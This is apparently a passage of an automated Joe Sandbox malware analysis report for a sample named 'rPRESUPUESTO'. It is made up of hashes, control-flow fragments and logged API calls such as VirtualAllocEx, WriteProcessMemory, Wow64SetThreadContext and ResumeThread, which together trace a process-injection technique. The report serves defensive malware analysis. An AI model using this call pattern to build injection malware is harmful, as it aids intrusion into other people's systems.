                                                • Opcode Fuzzy Hash: 6690f8b3cbbfb6bb32bd03f048c73a8d689b7d9649557ffd9df7b88d8ec903fd
                                                • Instruction Fuzzy Hash: F141E3B1C00719CFDB25CFA9C884B9DBBF6BF48304F24816AD508AB251DB756949CF50

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0110D5CE,?,?,?,?,?), ref: 0110D68F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 50a86fd6cea1c096f99142a84bb2ea2525b62a4fd4729a744dc9e8f4bab1d653
                                                • Instruction ID: f5fe0a3226a9dd5a215ee92db9072f21d98ee366968652db6cefd17b8e8581ff
                                                • Opcode Fuzzy Hash: 50a86fd6cea1c096f99142a84bb2ea2525b62a4fd4729a744dc9e8f4bab1d653
                                                • Instruction Fuzzy Hash: 183143B5C04349DFDB10CFAAD884ADEBFF8EB49320F14801AE958A3251C374A944CFA5

                                                Control-flow Graph

                                                control_flow_graph 687 78798a8-78798fe 690 7879900-787990c 687->690 691 787990e-787994d WriteProcessMemory 687->691 690->691 693 7879956-7879986 691->693 694 787994f-7879955 691->694 694->693
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07879940
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: ddb01bddb8e67b8e121da7460bb80d0a89b3728d288b93ee96e60a959065bfde
                                                • Instruction ID: f9a7e0bbdee6660bc91974243f757d0b20158c77865e2db07301dab627f22819
                                                • Opcode Fuzzy Hash: ddb01bddb8e67b8e121da7460bb80d0a89b3728d288b93ee96e60a959065bfde
                                                • Instruction Fuzzy Hash: E02148B190035A9FDB10CFA9C880BEEBFF5FF48320F10842AE959A7241D7749954CB64

                                                Control-flow Graph

                                                control_flow_graph 698 78798b0-78798fe 700 7879900-787990c 698->700 701 787990e-787994d WriteProcessMemory 698->701 700->701 703 7879956-7879986 701->703 704 787994f-7879955 701->704 704->703
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07879940
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: cdc711687bfea5ed9377e012e99e8f7492e35374657ca830c7643d5b4fdd7aa8
                                                • Instruction ID: c22fe73112f14d59e90eb0d9dc6f0564e096b21f8169601a8a272be6df9f2411
                                                • Opcode Fuzzy Hash: cdc711687bfea5ed9377e012e99e8f7492e35374657ca830c7643d5b4fdd7aa8
                                                • Instruction Fuzzy Hash: 782127B59003199FDB10CFA9C885BDEBBF5FF48320F10842AE959A7240D778A944DBA4

                                                Control-flow Graph

                                                control_flow_graph 708 7879710-7879763 710 7879765-7879771 708->710 711 7879773-78797a3 Wow64SetThreadContext 708->711 710->711 713 78797a5-78797ab 711->713 714 78797ac-78797dc 711->714 713->714
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07879796
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 243dd8668289e4f2f07191d13f6ea87c8a5f50a9b574b4c19dcb58a72b55d858
                                                • Instruction ID: 28a26025e9b7bd49906aa53da9baacb0e50dbad13ab4b823d2d992d0886f86b2
                                                • Opcode Fuzzy Hash: 243dd8668289e4f2f07191d13f6ea87c8a5f50a9b574b4c19dcb58a72b55d858
                                                • Instruction Fuzzy Hash: 902179B5D002098FDB10CFA9C484BEEBFF4EF98320F14842AD519A7241CB78A944CFA4

                                                Control-flow Graph

                                                control_flow_graph 718 7879998-7879a2d ReadProcessMemory 723 7879a36-7879a66 718->723 724 7879a2f-7879a35 718->724 724->723
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07879A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 788de0856d4cde459d4c4b2322ef9f35edd4326bb022847e4045d98531239cad
                                                • Instruction ID: cff014cbcb5add8d8ecb01f1efbcd5391bc160c656aec24352c950b57e3de7fc
                                                • Opcode Fuzzy Hash: 788de0856d4cde459d4c4b2322ef9f35edd4326bb022847e4045d98531239cad
                                                • Instruction Fuzzy Hash: B5212AB1C003599FDB10CFAAC881AEEFBF5FF58310F10842AE959A7240DB399944DB64
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0110D5CE,?,?,?,?,?), ref: 0110D68F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: bc94a2c2f531ec40e5f792430ab8f462477ca565d3e843d95f5dae53b624ccd9
                                                • Instruction ID: ce965252e38cc05057740d5899cab74f1747ce80b8b078a3d4795ce5d5758631
                                                • Opcode Fuzzy Hash: bc94a2c2f531ec40e5f792430ab8f462477ca565d3e843d95f5dae53b624ccd9
                                                • Instruction Fuzzy Hash: 1021E3B5D002499FDB10CFAAD984ADEFFF8EB48310F14841AE918A3350D374A950CFA5
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0110D5CE,?,?,?,?,?), ref: 0110D68F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 2c0af727be1a05ff6e3893c3c5e949cf9d86d2e01fd778f8e9be3f52ce54b7d1
                                                • Instruction ID: c4f4023d743768952fbd8d01e7671f952ac4841d3bef76ad4fe591b57913c5e7
                                                • Opcode Fuzzy Hash: 2c0af727be1a05ff6e3893c3c5e949cf9d86d2e01fd778f8e9be3f52ce54b7d1
                                                • Instruction Fuzzy Hash: F821E4B5D002499FDB14CFA9D984ADEBBF4FB48310F14841AE918A3250D378A944CF64
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07879796
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 4104711c3e1e8425dd1aae614f01e41a2f06a3b825eb0bd6f57c99f73618e810
                                                • Instruction ID: 3783a0b67633231b33f2e4ab11f2defd8af501b7811d015ebea3cb16dc1a030c
                                                • Opcode Fuzzy Hash: 4104711c3e1e8425dd1aae614f01e41a2f06a3b825eb0bd6f57c99f73618e810
                                                • Instruction Fuzzy Hash: 3F215BB5D003098FDB10DFAAC4857EEBBF4EF98320F14842AD519A7241DB78A944CFA4
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07879A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 0a89cdf1897636949f1b2851503be9f29cedbb9e5be10898516e6d55f1be2ff9
                                                • Instruction ID: 906dfce522a1346157086a4f798deab051eb9e4f46beb1b7b01660ccabae2a1e
                                                • Opcode Fuzzy Hash: 0a89cdf1897636949f1b2851503be9f29cedbb9e5be10898516e6d55f1be2ff9
                                                • Instruction Fuzzy Hash: 70213CB1C003599FDB10CFAAC881ADEFBF5FF48310F108429E959A7240D7359944DB64
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0787985E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5f4c250e3294bd87d13cbfd42a4f85390d61d2d57db0820a0e1f8eacbcc856bc
                                                • Instruction ID: b3f3f02b24d03c1481d7700a594b34149cfef1896a4460d7cb6985a93c02c9b8
                                                • Opcode Fuzzy Hash: 5f4c250e3294bd87d13cbfd42a4f85390d61d2d57db0820a0e1f8eacbcc856bc
                                                • Instruction Fuzzy Hash: F4114AB28002098FDB10DFA9C8446EFBBF5EF98320F248419D519A7250C7359944CFA0
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0110B419,00000800,00000000,00000000), ref: 0110B60A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 8e32b6c685424f57a4f7be3579936d53e51ea74eb14d03815faec1c257201db3
                                                • Instruction ID: 444284bf22d74bc4e830e4adfc1da216532e5b62470604bf3d49becb4723728d
                                                • Opcode Fuzzy Hash: 8e32b6c685424f57a4f7be3579936d53e51ea74eb14d03815faec1c257201db3
                                                • Instruction Fuzzy Hash: 651117B6C043099FDB14CF9AC844A9EFBF4EB88310F14841AD519B7240C375A544CFA9
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0787985E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 1dcf911bd8fb74ea1fef265badcc04132d91e86b828420cbc0f52da1c8919cfa
                                                • Instruction ID: 6b3b0917fc5ea4d402971e2264361b3ff0b0b0d4b151a8c0d9d99a41a5d54123
                                                • Opcode Fuzzy Hash: 1dcf911bd8fb74ea1fef265badcc04132d91e86b828420cbc0f52da1c8919cfa
                                                • Instruction Fuzzy Hash: 031167B28002099FCB10CFAAC844ADEBFF5EF88320F148419E519A7250CB35A940CFA0
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0110B419,00000800,00000000,00000000), ref: 0110B60A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 9cadcf623def07e7310d59b19df457198a6771ad1c19981b78a0900355b855ca
                                                • Instruction ID: f53a143d0278ff03b3187574cc75ebf1f269985dd54629714a2470996d59b28a
                                                • Opcode Fuzzy Hash: 9cadcf623def07e7310d59b19df457198a6771ad1c19981b78a0900355b855ca
                                                • Instruction Fuzzy Hash: 511123BAC002098FDB15CFAAC944ADEFBF4EB88310F14841ED919B7240C375A545CFA4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3c0ee0e8b51700b274b4ea2ba913b6fba72d8dbde4f07c0d5d812f406072eb2a
                                                • Instruction ID: dcbaecc2d397247d86faffb4f123512da67cd1bc42a79a47d9ac867aae3cfa9b
                                                • Opcode Fuzzy Hash: 3c0ee0e8b51700b274b4ea2ba913b6fba72d8dbde4f07c0d5d812f406072eb2a
                                                • Instruction Fuzzy Hash: 70118FB1D002498FDB10DFA9C4457DEFBF4EF98320F148419C519A7240DB35A944CF94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 795e83b50adda1d4dfc7dd96f8ea90ec6f8300166003e50bae6d52c3609c0646
                                                • Instruction ID: 8dd5b38befcd38dd6876f80c8ce514304a8f95750bfe15aba84bc85dcbed0b1a
                                                • Opcode Fuzzy Hash: 795e83b50adda1d4dfc7dd96f8ea90ec6f8300166003e50bae6d52c3609c0646
                                                • Instruction Fuzzy Hash: DC113AB1D002498FDB20DFAAC8457DEFBF4EF98324F248419D519A7240DB75A944CBA4
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0110B39E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b961fd26ce8acf61d282d4460eca4d8bd41a94095928a023814f9eca04b6d5e3
                                                • Instruction ID: 778d5f21159be338c8d1ed9e4d75dc2db02dccc29ebbc4b0a508116dd1461c97
                                                • Opcode Fuzzy Hash: b961fd26ce8acf61d282d4460eca4d8bd41a94095928a023814f9eca04b6d5e3
                                                • Instruction Fuzzy Hash: E71110BAC043498FDB14CF9AC844ADEFBF4EB88324F20841AD919B7240C375A545CFA5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0787C455
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 7f6affe58c3f57b536e89b04c02ed0c6bc4264e7cec12d84a1fd6d3fb9fc772e
                                                • Instruction ID: 1a2ed52c505d2cc8d2e19e78564c63aac944063686d512fd1db3786a63d61757
                                                • Opcode Fuzzy Hash: 7f6affe58c3f57b536e89b04c02ed0c6bc4264e7cec12d84a1fd6d3fb9fc772e
                                                • Instruction Fuzzy Hash: 181103B5800349DFDB10CF9AC849BEEBBF8EB59324F108419E919B7200C375A944CFA5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0787C455
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 21c6a654f268850d2bea8fe5174271f1987dd458d4782628623be46d023d6607
                                                • Instruction ID: 4b39085ddde2b7d90712f484923c709359c5311a0722949eaa7c6c7804a2b799
                                                • Opcode Fuzzy Hash: 21c6a654f268850d2bea8fe5174271f1987dd458d4782628623be46d023d6607
                                                • Instruction Fuzzy Hash: A611F5B5800249DFDB10CF99C885BDEBBF8EB58320F148419D918A3200C375A544CFA5
                                                • Opcode ID: e03eaabe67aed53158ebd8836601f6432eaed6ba7c2fcfd07d892499a392839c
                                                • Instruction ID: de8923a4e92a1329b59f5378aa9e98dddb9ffb723a97e1a32a6d8aa8c956096c
                                                • Opcode Fuzzy Hash: e03eaabe67aed53158ebd8836601f6432eaed6ba7c2fcfd07d892499a392839c
                                                • Instruction Fuzzy Hash: 6B012B714043449AE7218B1ACD84726BFB8EF41334F28C45AED1E4A2C7C7399941C6F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2153561672.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_c7d000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37e2bfff3d1b112bbc1b6e2f0bd5f0015a7cbfc3987b46263f4b492edf1b3fa1
                                                • Instruction ID: 1537267081c3e0cb6e29b78554aaebd09555bc8c4bbdb86e4b306671f548b8a8
                                                • Opcode Fuzzy Hash: 37e2bfff3d1b112bbc1b6e2f0bd5f0015a7cbfc3987b46263f4b492edf1b3fa1
                                                • Instruction Fuzzy Hash: 81F0C272404344AAE7108F05CD84B62FFA8EF51334F18C05AED0D4A287C379A840CAB1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHeq$PHeq
                                                • API String ID: 0-3382621680
                                                • Opcode ID: eb2d48643c809417e63df41060046c873649961ec3bec180cbaff0f7585d38cb
                                                • Instruction ID: 70ecc3f6bb77cb3f11ce76f06f57770eae2591cce5837711be5b277300f44d2c
                                                • Opcode Fuzzy Hash: eb2d48643c809417e63df41060046c873649961ec3bec180cbaff0f7585d38cb
                                                • Instruction Fuzzy Hash: 4CD1C1B5A00609CFDB08CF69C598AA9B7F1AF59305F2580E9E506EB361DB31ED41CF60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ec4470fbdb1ba594425b12d422300c1b9bdfaec3e82018db11b19d358570864
                                                • Instruction ID: d57b60c924b105d35cca3476502380cb6641f384db800f44f48632f073eb93a2
                                                • Opcode Fuzzy Hash: 2ec4470fbdb1ba594425b12d422300c1b9bdfaec3e82018db11b19d358570864
                                                • Instruction Fuzzy Hash: 7E223CB0E042198FCB14DF98C588AADBBF2BF99314F248169D459EB355D731E881CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09062f447e2f3ccf2f9199af425edd0e6d0719d09835a08cd12a67f0705a96a6
                                                • Instruction ID: b18ca4683bdd17d29d356b45ae23417c6b804c05b3f9045a650af29948a72453
                                                • Opcode Fuzzy Hash: 09062f447e2f3ccf2f9199af425edd0e6d0719d09835a08cd12a67f0705a96a6
                                                • Instruction Fuzzy Hash: 99E10BB4E042198FDB14DFA9C580AAEFBF2FF89304F248169D455AB355D734A981CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aabc2e0734d915fe8459b15c1c7a3f8540bc88a5abb15ec00267f89163795c5d
                                                • Instruction ID: 1afd4bd7cc3ef154ce443a6f489c4053e9da1ab15d1aa84c665923446e96cd91
                                                • Opcode Fuzzy Hash: aabc2e0734d915fe8459b15c1c7a3f8540bc88a5abb15ec00267f89163795c5d
                                                • Instruction Fuzzy Hash: E7E1E8B4E042198FCB14DFA9C580AAEFBF2FF89304F249169E515AB359D730A941CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32acb55b1524649aeeb3533c2b00f1f57eab127948a0e639cb55f72976777a3a
                                                • Instruction ID: 77c7a2df41d96f0d9524bc24cb647b0480033a5b236b863f9290e09d6546bdcd
                                                • Opcode Fuzzy Hash: 32acb55b1524649aeeb3533c2b00f1f57eab127948a0e639cb55f72976777a3a
                                                • Instruction Fuzzy Hash: 35E1E8B4E042198FCB14DFA9C5809AEFBF2FF89304F249169E555AB359D730A981CF60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2cd5de647c0249a63e34079f760025946a68389f6dc262358ca0ff28dda74724
                                                • Instruction ID: 894e245b758806be0c38bc396269e8074e3bfd979140271ae10a0218f36f98df
                                                • Opcode Fuzzy Hash: 2cd5de647c0249a63e34079f760025946a68389f6dc262358ca0ff28dda74724
                                                • Instruction Fuzzy Hash: B2E1FAB4E042198FCB14DFA9C5809AEFBF2FF89305F248169E415AB355D731A981CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0edc3c4c7dc22b5f121e0626e3842456ab33ade34971321245fb6560733f4879
                                                • Instruction ID: 7023a5f43134acba77041427a95ca7369b6dce2d979cec44a6e8c2521e77aed4
                                                • Opcode Fuzzy Hash: 0edc3c4c7dc22b5f121e0626e3842456ab33ade34971321245fb6560733f4879
                                                • Instruction Fuzzy Hash: DAA19332E00216CFCF1ADFB5D8445DEB7B2FF84304B15856AE901AB295DB71D956CB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14d60d9c44bf5813c31e3b19c5238a6c9755eddb83920bac83b25d8546a399f8
                                                • Instruction ID: a6b55e66c25f9cc59af9796cf9eba03b7cb00160af137d91d7ce23c85baadc34
                                                • Opcode Fuzzy Hash: 14d60d9c44bf5813c31e3b19c5238a6c9755eddb83920bac83b25d8546a399f8
                                                • Instruction Fuzzy Hash: 6A512CB0E042198FCB14DFA9C5445AEFBF2FF89304F24816AD419AB356D7319941CFA1

                                                Execution Graph

                                                Execution Coverage:1.1%
                                                Dynamic/Decrypted Code Coverage:4.7%
                                                Signature Coverage:7.3%
                                                Total number of Nodes:150
                                                Total number of Limit Nodes:10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 109 417bb3-417bdc call 42e203 112 417be2-417bf0 call 42e723 109->112 113 417bde-417be1 109->113 116 417c00-417c11 call 42cbc3 112->116 117 417bf2-417bfd call 42e9c3 112->117 122 417c13-417c27 LdrLoadDll 116->122 123 417c2a-417c2d 116->123 117->116 122->123
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C25
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction ID: 4328c0b8ac73ff2424a135461264386c77204433aa08a2932818e139f239ad44
                                                • Opcode Fuzzy Hash: 089cd7b1e32230f99f08fb05e4885b961d1b1c57f8a4bd243221de915f3ec884
                                                • Instruction Fuzzy Hash: 41011EB5E0420DBBDB10EBA5DC42FDEB778AB54308F00419AE91897241FA35EB548B95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 124 42b623-42b65c call 404933 call 42c6d3 NtClose
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction ID: 0ffedaf792a4ad4517e88bc314bd88d5aba1219f27c0b25af2807f74d76067d9
                                                • Opcode Fuzzy Hash: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction Fuzzy Hash: 14E08C722406147BC220EA6ADC41F9BB7ACDFC5715F00402AFA0CAB242D670BA058BF4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 138 1812b60-1812b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8acd668385cafe028139793b7531478e84e9a30557f8c8e85032e2f40671694c
                                                • Instruction ID: 1b6f9368f38854a1e7e43305ee862ba5052db39c601449f41626bd50172597bf
                                                • Opcode Fuzzy Hash: 8acd668385cafe028139793b7531478e84e9a30557f8c8e85032e2f40671694c
                                                • Instruction Fuzzy Hash: DA90026120241007450671584415616404A97E1301B55C021E6028590DC9258AD56226
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
